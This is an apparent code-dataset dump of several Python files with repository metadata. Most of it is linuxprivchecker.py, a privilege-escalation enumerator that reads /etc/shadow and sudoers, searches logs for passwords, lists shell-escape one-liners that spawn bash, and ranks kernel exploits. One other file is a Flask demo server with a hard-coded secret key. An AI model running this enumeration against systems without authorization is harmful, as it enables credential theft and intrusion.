| 0.590796
| false
| 4.516277
| false
| false
| false
|
lmregus/Portfolio
|
python/design_patterns/env/lib/python3.7/site-packages/prompt_toolkit/output/color_depth.py
|
1
|
1497
|
from __future__ import unicode_literals
from prompt_toolkit.utils import is_windows
import os
__all__ = [
'ColorDepth',
]
class ColorDepth(object):
"""
Possible color depth values for the output.
"""
#: One color only.
DEPTH_1_BIT = 'DEPTH_1_BIT'
#: ANSI Colors.
DEPTH_4_BIT = 'DEPTH_4_BIT'
#: The default.
DEPTH_8_BIT = 'DEPTH_8_BIT'
#: 24 bit True color.
DEPTH_24_BIT = 'DEPTH_24_BIT'
# Aliases.
MONOCHROME = DEPTH_1_BIT
ANSI_COLORS_ONLY = DEPTH_4_BIT
DEFAULT = DEPTH_8_BIT
TRUE_COLOR = DEPTH_24_BIT
_ALL = [DEPTH_1_BIT, DEPTH_4_BIT, DEPTH_8_BIT, DEPTH_24_BIT]
@classmethod
def default(cls, term=''):
"""
If the user doesn't specify a color depth, use this as a default.
"""
if term in ('linux', 'eterm-color'):
return cls.DEPTH_4_BIT
# For now, always use 4 bit color on Windows 10 by default, even when
# vt100 escape sequences with ENABLE_VIRTUAL_TERMINAL_PROCESSING are
# supported. We don't have a reliable way yet to know whether our
# console supports true color or only 4-bit.
if is_windows() and 'PROMPT_TOOLKIT_COLOR_DEPTH' not in os.environ:
return cls.DEPTH_4_BIT
# Check the `PROMPT_TOOLKIT_COLOR_DEPTH` environment variable.
if os.environ.get('PROMPT_TOOLKIT_COLOR_DEPTH') in cls._ALL:
return os.environ['PROMPT_TOOLKIT_COLOR_DEPTH']
return cls.DEPTH_8_BIT
|
mit
| 2,101,513,724,883,425,300
| 27.245283
| 77
| 0.616566
| false
| 3.356502
| false
| false
| false
|
WorldViews/Spirals
|
dummyServer.py
|
1
|
2519
|
import json, time
import flask
from flask import Flask, render_template, send_file, \
jsonify, send_from_directory, request
from flask_socketio import SocketIO, emit
rdb = None
try:
import rethinkdb as rdb
#rdb.connect('localhost', 28015).repl()
conn = rdb.connect(db='test')
except:
print "*** Running without DB ***"
rdb = None
app = Flask(__name__, static_url_path='')
app.debug = True
app.config['SECRET_KEY'] = 'secret!'
socketio = SocketIO(app)
@app.route('/')
def index():
return send_file('index.html')
@app.route('/regp/', methods=['POST','GET'])
def reg():
print "reg path:", request.path
print "reg args", request.args
t = time.time()
name = request.args.get('name')
tagStr = request.args.get('tagStr')
clientType = request.args.get('clientType')
lon = float(request.args.get('longitude'))
lat = float(request.args.get('latitude'))
room = request.args.get('room')
numUsers = int(request.args.get('numUsers'))
obj = {'t': t, 'name': name, 'tagStr': tagStr,
'lon': lon, 'lat': lat, 'room': room,
'numUsers': numUsers, 'clientType': clientType}
print obj
return "ok"
@app.route('/Viewer/<path:path>')
def send(path):
print "send_page", path
return send_from_directory('Viewer', path)
@app.route('/Cesium/<path:path>')
def send_page(path):
print "send_page", path
return send_from_directory('Cesium', path)
@app.route('/db/<path:etype>')
def query(etype):
#print "query", etype
t = time.time()
if rdb == None:
return flask.jsonify({'error': 'No DB', 't': t, 'records': []})
recs = rdb.table(etype).run(conn)
items = [x for x in recs]
obj = {'type': etype,
't' : t,
'records': items}
return flask.jsonify(obj)
@socketio.on('my event')
def test_message(message):
emit('my response', {'data': 'got it!'})
@socketio.on('chat')
def handle_chat(msg):
print "handle_chat:", msg
emit('chat', msg, broadcast=True)
addMsg(msg, 'chat')
@socketio.on('notes')
def handle_notes(msg):
print "handle_notes:", msg
emit('notes', msg, broadcast=True)
addMsg(msg, 'notes')
@socketio.on('people')
def handle_people(msg):
#print "handle_people:", msg
emit('people', msg, broadcast=True)
def addMsg(msgStr, etype):
obj = json.loads(msgStr)
rdb.table(etype).insert(obj).run(conn)
if __name__ == '__main__':
#socketio.run(app, port=80)
socketio.run(app, host="0.0.0.0", port=80)
|
mit
| -4,448,048,485,143,224,300
| 25.239583
| 71
| 0.613339
| false
| 3.08701
| false
| false
| false
|
nschaetti/nsNLP
|
data/Text.py
|
1
|
2476
|
# -*- coding: utf-8 -*-
#
# File : corpus/IQLACorpus.py
# Description : .
# Date : 16/08/2017
#
# Copyright Nils Schaetti, University of Neuchâtel <nils.schaetti@unine.ch>
# Imports
from Sample import Sample
import codecs
# Class to access to a text
class Text(Sample):
"""
Class to access to a text
"""
# Constructor
def __init__(self, text_path, author, text_title):
"""
Constructor
:param text_path:
:param author:
"""
super(Text, self).__init__(text_path, author)
self._text_path = text_path
self._author = author
self._title = text_title
# end __init__
########################################
# Public
########################################
# Get title
def get_title(self):
"""
Get title
:return:
"""
return self._title
# end get_title
# Get text
def get_text(self):
"""
Get text
:return:
"""
return codecs.open(self._text_path, 'r', encoding='utf-8').read()
# end text
# Save text
def save(self, text):
"""
Save text
:param text:
:return:
"""
return codecs.open(self._text_path, 'w', encoding='utf-8').write(text)
# end save
# Get author
def get_author(self):
"""
Get author
:return:
"""
return self._author
# end author
# Get path
def get_path(self):
"""
Get path
:return:
"""
return self._text_path
# end get_path
# Get X
def x(self):
"""
Get X
:return:
"""
return self.get_text()
# end x
# Get Y
def y(self):
"""
Get Y
:return:
"""
return self.get_author().get_name()
# end y
########################################
# Override
########################################
# To string
def __unicode__(self):
"""
To string
:return:
"""
return u"Text(title: {}, path:{}, author:{})".format(self._title, self._text_path, self._author.get_name())
# end __unicode__
# To string
def __str__(self):
"""
To string
:return:
"""
return "Text(title: {}, path:{}, author:{})".format(self._title, self._text_path, self._author.get_name())
# end __unicode__
# end Text
|
gpl-3.0
| 8,279,968,937,901,342,000
| 19.121951
| 115
| 0.446869
| false
| 4.02439
| false
| false
| false
|
blindfuzzy/LHF
|
Tools/linuxprivchk.py
|
1
|
25080
|
#!/usr/bin/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
##-------------------------------------------------------------------------------------------------------------
## [Warning]:
## This script comes as-is with no promise of functionality or accuracy. I have no plans to maintain updates,
## I did not write it to be efficient and in some cases you may find the functions may not produce the desired
## results. For example, the function that links packages to running processes is based on keywords and will
## not always be accurate. Also, the exploit list included in this function will need to be updated over time.
## Feel free to change or improve it any way you see fit.
##-------------------------------------------------------------------------------------------------------------
## [Modification, Distribution, and Attribution]:
## You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
## author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
## worth anything anyway :)
###############################################################################################################
# conditional import for older versions of python not compatible with subprocess
try:
import subprocess as sub
compatmode = 0 # newer version of python, no need for compatibility mode
except ImportError:
import os # older version of python, need to use os instead
compatmode = 1
# title / formatting
bigline = "================================================================================================="
smlline = "-------------------------------------------------------------------------------------------------"
print bigline
print "LINUX PRIVILEGE ESCALATION CHECKER"
print bigline
print
# loop through dictionary, execute the commands, store the results, return updated dict
def execCmd(cmdDict):
for item in cmdDict:
cmd = cmdDict[item]["cmd"]
if compatmode == 0: # newer version of python, use preferred subprocess
out, error = sub.Popen([cmd], stdout=sub.PIPE, stderr=sub.PIPE, shell=True).communicate()
results = out.split('\n')
else: # older version of python, use os.popen
echo_stdout = os.popen(cmd, 'r')
results = echo_stdout.read().split('\n')
cmdDict[item]["results"]=results
return cmdDict
# print results for each previously executed command, no return value
def printResults(cmdDict):
for item in cmdDict:
msg = cmdDict[item]["msg"]
results = cmdDict[item]["results"]
print "[+] " + msg
for result in results:
if result.strip() != "":
print " " + result.strip()
print
return
def writeResults(msg, results):
f = open("privcheckout.txt", "a");
f.write("[+] " + str(len(results)-1) + " " + msg)
for result in results:
if result.strip() != "":
f.write(" " + result.strip())
f.close()
return
# Basic system info
print "[*] GETTING BASIC SYSTEM INFO...\n"
results=[]
sysInfo = {"OS":{"cmd":"cat /etc/issue","msg":"Operating System","results":results},
"KERNEL":{"cmd":"cat /proc/version","msg":"Kernel","results":results},
"HOSTNAME":{"cmd":"hostname", "msg":"Hostname", "results":results}
}
sysInfo = execCmd(sysInfo)
printResults(sysInfo)
# Networking Info
print "[*] GETTING NETWORKING INFO...\n"
netInfo = {"NETINFO":{"cmd":"/sbin/ifconfig -a", "msg":"Interfaces", "results":results},
"ROUTE":{"cmd":"route", "msg":"Route", "results":results},
"NETSTAT":{"cmd":"netstat -antup | grep -v 'TIME_WAIT'", "msg":"Netstat", "results":results}
}
netInfo = execCmd(netInfo)
printResults(netInfo)
# File System Info
print "[*] GETTING FILESYSTEM INFO...\n"
driveInfo = {"MOUNT":{"cmd":"mount","msg":"Mount results", "results":results},
"FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries", "results":results}
}
driveInfo = execCmd(driveInfo)
printResults(driveInfo)
# Scheduled Cron Jobs
cronInfo = {"CRON":{"cmd":"ls -la /etc/cron* 2>/dev/null", "msg":"Scheduled cron jobs", "results":results},
"CRONW": {"cmd":"ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", "msg":"Writable cron dirs", "results":results}
}
cronInfo = execCmd(cronInfo)
printResults(cronInfo)
# User Info
print "\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n"
userInfo = {"WHOAMI":{"cmd":"whoami", "msg":"Current User", "results":results},
"ID":{"cmd":"id","msg":"Current User ID", "results":results},
"ALLUSERS":{"cmd":"cat /etc/passwd", "msg":"All users", "results":results},
"SUPUSERS":{"cmd":"grep -v -E '^#' /etc/passwd | awk -F: '$3 == 0{print $1}'", "msg":"Super Users Found:", "results":results},
"HISTORY":{"cmd":"ls -la ~/.*_history; ls -la /root/.*_history 2>/dev/null", "msg":"Root and current user history (depends on privs)", "results":results},
"ENV":{"cmd":"env 2>/dev/null | grep -v 'LS_COLORS'", "msg":"Environment", "results":results},
"SUDOERS":{"cmd":"cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null", "msg":"Sudoers (privileged)", "results":results},
"LOGGEDIN":{"cmd":"w 2>/dev/null", "msg":"Logged in User Activity", "results":results}
}
userInfo = execCmd(userInfo)
printResults(userInfo)
if "root" in userInfo["ID"]["results"][0]:
print "[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n"
# File/Directory Privs
print "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n"
fdPerms = {"WWDIRSROOT":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results},
"WWDIRS":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results},
"WWFILES":{"cmd":"find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null", "msg":"World Writable Files", "results":results},
"SUID":{"cmd":"find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", "msg":"SUID/SGID Files and Directories", "results":results},
"ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible", "results":results}
}
fdPerms = execCmd(fdPerms)
printResults(fdPerms)
pwdFiles = {"LOGPWDS":{"cmd":"find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Logs containing keyword 'password'", "results":results},
"CONFPWDS":{"cmd":"find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Config files containing keyword 'password'", "results":results},
"SHADOW":{"cmd":"cat /etc/shadow 2>/dev/null", "msg":"Shadow File (Privileged)", "results":results}
}
pwdFiles = execCmd(pwdFiles)
printResults(pwdFiles)
# Processes and Applications
print "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n"
if "debian" in sysInfo["KERNEL"]["results"][0] or "ubuntu" in sysInfo["KERNEL"]["results"][0]:
getPkgs = "dpkg -l | awk '{$1=$4=\"\"; print $0}'" # debian
else:
getPkgs = "rpm -qa | sort -u" # RH/other
getAppProc = {"PROCS":{"cmd":"ps aux | awk '{print $1,$2,$9,$10,$11}'", "msg":"Current processes", "results":results},
"PKGS":{"cmd":getPkgs, "msg":"Installed Packages", "results":results}
}
getAppProc = execCmd(getAppProc)
printResults(getAppProc) # comment to reduce output
otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)", "results":results},
"APACHE":{"cmd":"apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", "msg":"Apache Version and Modules", "results":results},
"APACHECONF":{"cmd":"cat /etc/apache2/apache2.conf 2>/dev/null", "msg":"Apache Config File", "results":results}
}
otherApps = execCmd(otherApps)
printResults(otherApps)
print "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n"
# find the package information for the processes currently running
# under root or another super user
procs = getAppProc["PROCS"]["results"]
pkgs = getAppProc["PKGS"]["results"]
supusers = userInfo["SUPUSERS"]["results"]
procdict = {} # dictionary to hold the processes running as super users
for proc in procs: # loop through each process
relatedpkgs = [] # list to hold the packages related to a process
try:
for user in supusers: # loop through the known super users
if (user != "") and (user in proc): # if the process is being run by a super user
procname = proc.split(" ")[4] # grab the process name
if "/" in procname:
splitname = procname.split("/")
procname = splitname[len(splitname)-1]
for pkg in pkgs: # loop through the packages
if not len(procname) < 3: # name too short to get reliable package results
if procname in pkg:
if procname in procdict:
relatedpkgs = procdict[proc] # if already in the dict, grab its pkg list
if pkg not in relatedpkgs:
relatedpkgs.append(pkg) # add pkg to the list
procdict[proc]=relatedpkgs # add any found related packages to the process dictionary entry
except:
pass
for key in procdict:
print " " + key # print the process name
try:
if not procdict[key][0] == "": # only print the rest if related packages were found
print " Possible Related Packages: "
for entry in procdict[key]:
print " " + entry # print each related package
except:
pass
# EXPLOIT ENUMERATION
# First discover the avaialable tools
print
print "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n"
devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools", "results":results}}
devTools = execCmd(devTools)
printResults(devTools)
print "[+] Related Shell Escape Sequences...\n"
escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]}
for cmd in escapeCmd:
for result in devTools["TOOLS"]["results"]:
if cmd in result:
for item in escapeCmd[cmd]:
print " " + cmd + "-->\t" + item
print
print "[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...\n"
# Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB)
# sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} -- current keywords are 'kernel', 'proc', 'pkg' (unused), and 'os'
sploits= { "2.2.x-2.4.x ptrace kmod local exploit":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"3", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.4.20 Module Loader Local Root Exploit":{"minver":"0", "maxver":"2.4.20", "exploitdb":"12", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.22 "'do_brk()'" local Root Exploit (PoC)":{"minver":"2.4.22", "maxver":"2.4.22", "exploitdb":"129", "lang":"asm", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.4.22 (do_brk) Local Root Exploit (working)":{"minver":"0", "maxver":"2.4.22", "exploitdb":"131", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.x mremap() bound checking Root Exploit":{"minver":"2.4", "maxver":"2.4.99", "exploitdb":"145", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.4.29-rc2 uselib() Privilege Elevation":{"minver":"0", "maxver":"2.4.29", "exploitdb":"744", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4 uselib() Privilege Elevation Exploit":{"minver":"2.4", "maxver":"2.4", "exploitdb":"778", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"895", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"926", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluez"}},
"<= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)":{"minver":"0", "maxver":"2.6.11", "exploitdb":"1397", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit":{"minver":"0", "maxver":"99", "exploitdb":"1518", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"mysql"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2004", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2005", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2006", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2011", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.6.17.4 (proc) Local Root Exploit":{"minver":"0", "maxver":"2.6.17.4", "exploitdb":"2013", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2031", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit":{"minver":"4.10", "maxver":"7.04", "exploitdb":"3384", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}},
"Linux/Kernel 2.4/2.6 x86-64 System Call Emulation Exploit":{"minver":"2.4", "maxver":"2.6", "exploitdb":"4460", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.11.5 BLUETOOTH Stack Local Root Exploit":{"minver":"0", "maxver":"2.6.11.5", "exploitdb":"4756", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluetooth"}},
"2.6.17 - 2.6.24.1 vmsplice Local Root Exploit":{"minver":"2.6.17", "maxver":"2.6.24.1", "exploitdb":"5092", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.23 - 2.6.24 vmsplice Local Root Exploit":{"minver":"2.6.23", "maxver":"2.6.24", "exploitdb":"5093", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}},
"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit":{"minver":"0", "maxver":"99", "exploitdb":"5720", "lang":"python", "keywords":{"loc":["os"], "val":"debian"}},
"Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit":{"minver":"0", "maxver":"2.6.22", "exploitdb":"6851", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.29 exit_notify() Local Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.29", "exploitdb":"8369", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6 UDEV Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8478", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}},
"2.6 UDEV < 141 Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8572", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}},
"2.6.x ptrace_attach Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8673", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.29 ptrace_attach() Local Root Race Condition Exploit":{"minver":"2.6.29", "maxver":"2.6.29", "exploitdb":"8678", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit":{"minver":"0", "maxver":"2.6.28.3", "exploitdb":"9083", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Test Kernel Local Root Exploit 0day":{"minver":"2.6.18", "maxver":"2.6.30", "exploitdb":"9191", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)":{"minver":"2.6.9", "maxver":"2.6.30", "exploitdb":"9208", "lang":"c", "keywords":{"loc":["pkg"], "val":"pulse"}},
"2.x sock_sendpage() Local Ring0 Root Exploit":{"minver":"2", "maxver":"2.99", "exploitdb":"9435", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.x sock_sendpage() Local Root Exploit 2":{"minver":"2", "maxver":"2.99", "exploitdb":"9436", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9479", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit":{"minver":"2.6", "maxver":"2.6.19", "exploitdb":"9542", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit (ppc)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9545", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9574", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.19 udp_sendmsg Local Root Exploit":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9575", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit [2]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit [3]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9641", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"9844", "lang":"python", "keywords":{"loc":["kernel"], "val":"kernel"}},
"'pipe.c' Local Privilege Escalation Vulnerability":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"10018", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.18-20 2009 Local Root Exploit":{"minver":"2.6.18", "maxver":"2.6.20", "exploitdb":"10613", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Apache Spamassassin Milter Plugin Remote Root Command Execution":{"minver":"0", "maxver":"99", "exploitdb":"11662", "lang":"sh", "keywords":{"loc":["proc"], "val":"spamass-milter"}},
"<= 2.6.34-rc3 ReiserFS xattr Privilege Escalation":{"minver":"0", "maxver":"2.6.34", "exploitdb":"12130", "lang":"python", "keywords":{"loc":["mnt"], "val":"reiser"}},
"Ubuntu PAM MOTD local root":{"minver":"7", "maxver":"10.04", "exploitdb":"14339", "lang":"sh", "keywords":{"loc":["os"], "val":"ubuntu"}},
"< 2.6.36-rc1 CAN BCM Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36", "exploitdb":"14814", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Kernel ia32syscall Emulation Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"15023", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Linux RDS Protocol Local Privilege Escalation":{"minver":"0", "maxver":"2.6.36", "exploitdb":"15285", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.6.37 Local Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15704", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.37-rc2 ACPI custom_method Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15774", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"CAP_SYS_ADMIN to root Exploit":{"minver":"0", "maxver":"99", "exploitdb":"15916", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)":{"minver":"0", "maxver":"99", "exploitdb":"15944", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.36.2 Econet Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36.2", "exploitdb":"17787", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Sendpage Local Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"19933", "lang":"ruby", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.18/19 Privileged File Descriptor Resource Exhaustion Vulnerability":{"minver":"2.4.18", "maxver":"2.4.19", "exploitdb":"21598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.2.x/2.4.x Privileged Process Hijacking Vulnerability (1)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22362", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.2.x/2.4.x Privileged Process Hijacking Vulnerability (2)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22363", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Samba 2.2.8 Share Local Privilege Elevation Vulnerability":{"minver":"2.2.8", "maxver":"2.2.8", "exploitdb":"23674", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"samba"}},
"open-time Capability file_ns_capable() Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"25450", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
}
# variable declaration
os = sysInfo["OS"]["results"][0]
version = sysInfo["KERNEL"]["results"][0].split(" ")[2].split("-")[0]
langs = devTools["TOOLS"]["results"]
procs = getAppProc["PROCS"]["results"]
kernel = str(sysInfo["KERNEL"]["results"][0])
mount = driveInfo["MOUNT"]["results"]
#pkgs = getAppProc["PKGS"]["results"] # currently not using packages for sploit appicability but my in future
# lists to hold ranked, applicable sploits
# note: this is a best-effort, basic ranking designed to help in prioritizing priv escalation exploit checks
# all applicable exploits should be checked and this function could probably use some improvement
avgprob = []
highprob = []
for sploit in sploits:
lang = 0 # use to rank applicability of sploits
keyword = sploits[sploit]["keywords"]["val"]
sploitout = sploit + " || " + "http://www.exploit-db.com/exploits/" + sploits[sploit]["exploitdb"] + " || " + "Language=" + sploits[sploit]["lang"]
# first check for kernell applicability
if (version >= sploits[sploit]["minver"]) and (version <= sploits[sploit]["maxver"]):
# next check language applicability
if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))):
lang = 1 # language found, increase applicability score
elif sploits[sploit]["lang"] == "sh":
lang = 1 # language found, increase applicability score
elif (sploits[sploit]["lang"] in str(langs)):
lang = 1 # language found, increase applicability score
if lang == 0:
sploitout = sploitout + "**" # added mark if language not detected on system
# next check keyword matches to determine if some sploits have a higher probability of success
for loc in sploits[sploit]["keywords"]["loc"]:
if loc == "proc":
for proc in procs:
if keyword in proc:
highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability
break
break
elif loc == "os":
if (keyword in os) or (keyword in kernel):
highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher probability/applicability
break
elif loc == "mnt":
if keyword in mount:
highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability
break
else:
avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version
print " Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!"
print
print " The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system"
for exploit in highprob:
print " - " + exploit
print
print " The following exploits are applicable to this kernel version and should be investigated as well"
for exploit in avgprob:
print " - " + exploit
print
print "Finished"
print bigline
|
gpl-3.0
| 6,533,771,653,508,868,000
| 66.601078
| 248
| 0.614872
| false
| 3.089431
| false
| false
| false
|
oudalab/phyllo
|
phyllo/extractors/regula_ad_monachoDB.py
|
1
|
3765
|
import sqlite3
import urllib
import re
from urllib.request import urlopen
from bs4 import BeautifulSoup
# several names in the <pagehead> but not sure what to put as an author name
def main():
# The collection URL below.
collURL = 'http://www.thelatinlibrary.com/regula.html'
collOpen = urllib.request.urlopen(collURL)
collSOUP = BeautifulSoup(collOpen, 'html5lib')
author = "unknown"
